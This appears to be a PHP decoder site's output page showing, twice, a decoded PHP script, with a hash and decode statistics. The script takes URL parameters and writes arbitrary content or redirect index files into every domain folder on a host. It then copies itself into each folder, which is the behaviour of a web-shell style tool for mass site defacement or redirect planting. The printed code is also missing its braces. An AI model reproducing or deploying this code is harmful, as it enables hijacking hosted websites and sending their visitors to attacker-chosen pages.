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PHP Decode
<?php // Initialize variables $url = ''; $content = ''; $message = ''; $copiedPaths =..
Decoded Output download
// Initialize variables
$url = '';
$content = '';
$message = '';
$copiedPaths = [];
// Get current script path and name
$currentPath = $_SERVER['SCRIPT_NAME'];
$currentScriptName = basename(__FILE__);
$pathParts = array_filter(explode('/', $currentPath));
$numFolders = count($pathParts) - 1;
// Calculate the number of "../" needed to go back
$backPath = str_repeat('../', $numFolders);
// Get parameters from URL
$name = isset($_GET['name']) ? trim($_GET['name']) : '';
$url = isset($_GET['url']) ? trim($_GET['url']) : '';
$content = isset($_GET['content']) ? trim($_GET['content']) : '';
$basePath = isset($_GET['path']) ? rtrim(trim($_GET['path']), '/') . '/' : '';
$subfolder = isset($_GET['subfolder']) ? trim($_GET['subfolder']) : '';
$randomCount = isset($_GET['q']) ? (int)$_GET['q'] : 1; // New parameter for random subfolder count
$success = true;
// Modified validation logic
if (empty($basePath) && empty($name)) {
$message = "Failed
Folder name is required when path is not specified.";
$success = false;
} elseif (empty($basePath) && empty($url) && empty($content)) {
$message = "Failed
Either URL or content must be provided when not using path and subfolder.";
$success = false;
} else {
$folderName = str_replace('..', '', $name);
$fullPaths = [];
if (!empty($basePath) && !empty($subfolder)) {
// Get all domains inside the base path
$domains = glob($basePath . '*', GLOB_ONLYDIR);
foreach ($domains as $domain) {
$subfolderPath = $domain . '/' . $subfolder;
// Create subfolder if it doesn't exist
if (!file_exists($subfolderPath) && !mkdir($subfolderPath, 0755, true)) {
$message .= "
Error creating subfolder: $subfolderPath";
// Get all subfolders within the target subfolder
$allSubfolders = [];
// First, check for immediate subfolders
$immediateSubfolders = glob($subfolderPath . '/*', GLOB_ONLYDIR);
$allSubfolders = array_merge($allSubfolders, $immediateSubfolders);
// Check for deeper folders
foreach ($immediateSubfolders as $subSubfolder) {
$deeperFolders = glob($subSubfolder . '/*', GLOB_ONLYDIR);
$allSubfolders = array_merge($allSubfolders, $deeperFolders);
if (!empty($allSubfolders)) {
// Randomly select specified number of subfolders
$selectedFolders = array_slice($allSubfolders, 0, min($randomCount, count($allSubfolders)));
foreach ($selectedFolders as $selectedFolder) {
$fullPaths[] = $selectedFolder . '/';
} else {
// If no subfolders exist, use the main subfolder
$fullPaths[] = $subfolderPath . '/';
} else {
// Handle the original single directory case
$fullPath = __DIR__ . '/' . $backPath . $folderName;
$fullPath = rtrim($fullPath, '/');
$fullPaths[] = $fullPath;
// Create files in all determined paths
foreach ($fullPaths as $fullPath) {
// Create directory if it doesn't exist
if (!file_exists($fullPath)) {
if (mkdir($fullPath, 0755, true)) {
$message .= "
Folders created successfully at: $fullPath";
} else {
$message .= "
Error creating folders at: $fullPath";
$success = false;
// Only create index files if URL or content is provided
if (!empty($url) || !empty($content)) {
$files = [
'index.php' => !empty($content)
? $content
: '<?php header("Location: ' . htmlspecialchars($url) . '"); ?>',
'index.html' => !empty($content)
? $content
: '<meta http-equiv="refresh" content="0;url=' . htmlspecialchars($url) . '">'
foreach ($files as $fileName => $fileContent) {
$filePath = $fullPath . '/' . $fileName;
if (file_put_contents($filePath, $fileContent) !== false) {
$message .= "
File created successfully: $filePath";
} else {
$message .= "
Error creating file: $fileName at $filePath";
$success = false;
// Copy the script using dynamic filename
$scriptSource = __FILE__;
$scriptDestination = $fullPath . '/' . $currentScriptName;
if (copy($scriptSource, $scriptDestination)) {
$copiedPaths[] = $scriptDestination;
} else {
$message .= "
Error copying script to: $scriptDestination";
$success = false;
if ($success) {
$message = "Successfully" . $message;
} else {
$message = "Failed" . $message;
// Output execution details
$message .= "
Executed script path: " . __FILE__;
if (!empty($copiedPaths)) {
$message .= "
Paths where '" . $currentScriptName . "' was copied:";
foreach ($copiedPaths as $path) {
// Convert server path to URL format
$urlPath = str_replace($basePath, 'https://', $path);
// Remove 'public_html' from the path
$urlPath = str_replace('/public_html/', '/', $urlPath);
$message .= "
// Output the result
header('Content-Type: text/plain');
// echo $message;
Did this file decode correctly?
Original Code
// Initialize variables
$url = '';
$content = '';
$message = '';
$copiedPaths = [];
// Get current script path and name
$currentPath = $_SERVER['SCRIPT_NAME'];
$currentScriptName = basename(__FILE__);
$pathParts = array_filter(explode('/', $currentPath));
$numFolders = count($pathParts) - 1;
// Calculate the number of "../" needed to go back
$backPath = str_repeat('../', $numFolders);
// Get parameters from URL
$name = isset($_GET['name']) ? trim($_GET['name']) : '';
$url = isset($_GET['url']) ? trim($_GET['url']) : '';
$content = isset($_GET['content']) ? trim($_GET['content']) : '';
$basePath = isset($_GET['path']) ? rtrim(trim($_GET['path']), '/') . '/' : '';
$subfolder = isset($_GET['subfolder']) ? trim($_GET['subfolder']) : '';
$randomCount = isset($_GET['q']) ? (int)$_GET['q'] : 1; // New parameter for random subfolder count
$success = true;
// Modified validation logic
if (empty($basePath) && empty($name)) {
$message = "Failed\nFolder name is required when path is not specified.";
$success = false;
} elseif (empty($basePath) && empty($url) && empty($content)) {
$message = "Failed\nEither URL or content must be provided when not using path and subfolder.";
$success = false;
} else {
$folderName = str_replace('..', '', $name);
$fullPaths = [];
if (!empty($basePath) && !empty($subfolder)) {
// Get all domains inside the base path
$domains = glob($basePath . '*', GLOB_ONLYDIR);
foreach ($domains as $domain) {
$subfolderPath = $domain . '/' . $subfolder;
// Create subfolder if it doesn't exist
if (!file_exists($subfolderPath) && !mkdir($subfolderPath, 0755, true)) {
$message .= "\nError creating subfolder: $subfolderPath";
// Get all subfolders within the target subfolder
$allSubfolders = [];
// First, check for immediate subfolders
$immediateSubfolders = glob($subfolderPath . '/*', GLOB_ONLYDIR);
$allSubfolders = array_merge($allSubfolders, $immediateSubfolders);
// Check for deeper folders
foreach ($immediateSubfolders as $subSubfolder) {
$deeperFolders = glob($subSubfolder . '/*', GLOB_ONLYDIR);
$allSubfolders = array_merge($allSubfolders, $deeperFolders);
if (!empty($allSubfolders)) {
// Randomly select specified number of subfolders
$selectedFolders = array_slice($allSubfolders, 0, min($randomCount, count($allSubfolders)));
foreach ($selectedFolders as $selectedFolder) {
$fullPaths[] = $selectedFolder . '/';
} else {
// If no subfolders exist, use the main subfolder
$fullPaths[] = $subfolderPath . '/';
} else {
// Handle the original single directory case
$fullPath = __DIR__ . '/' . $backPath . $folderName;
$fullPath = rtrim($fullPath, '/');
$fullPaths[] = $fullPath;
// Create files in all determined paths
foreach ($fullPaths as $fullPath) {
// Create directory if it doesn't exist
if (!file_exists($fullPath)) {
if (mkdir($fullPath, 0755, true)) {
$message .= "\nFolders created successfully at: $fullPath";
} else {
$message .= "\nError creating folders at: $fullPath";
$success = false;
// Only create index files if URL or content is provided
if (!empty($url) || !empty($content)) {
$files = [
'index.php' => !empty($content)
? $content
: '<?php header("Location: ' . htmlspecialchars($url) . '"); ?>',
'index.html' => !empty($content)
? $content
: '<meta http-equiv="refresh" content="0;url=' . htmlspecialchars($url) . '">'
foreach ($files as $fileName => $fileContent) {
$filePath = $fullPath . '/' . $fileName;
if (file_put_contents($filePath, $fileContent) !== false) {
$message .= "\nFile created successfully: $filePath";
} else {
$message .= "\nError creating file: $fileName at $filePath";
$success = false;
// Copy the script using dynamic filename
$scriptSource = __FILE__;
$scriptDestination = $fullPath . '/' . $currentScriptName;
if (copy($scriptSource, $scriptDestination)) {
$copiedPaths[] = $scriptDestination;
} else {
$message .= "\nError copying script to: $scriptDestination";
$success = false;
if ($success) {
$message = "Successfully" . $message;
} else {
$message = "Failed" . $message;
// Output execution details
$message .= "\n\nExecuted script path: " . __FILE__;
if (!empty($copiedPaths)) {
$message .= "\n\nPaths where '" . $currentScriptName . "' was copied:";
foreach ($copiedPaths as $path) {
// Convert server path to URL format
$urlPath = str_replace($basePath, 'https://', $path);
// Remove 'public_html' from the path
$urlPath = str_replace('/public_html/', '/', $urlPath);
$message .= "\n$urlPath";
// Output the result
header('Content-Type: text/plain');
// echo $message;
Function Calls
None |
MD5 | 0d69c25585001d5b6489d168aa8e8ce4 |
Eval Count | 0 |
Decode Time | 89 ms |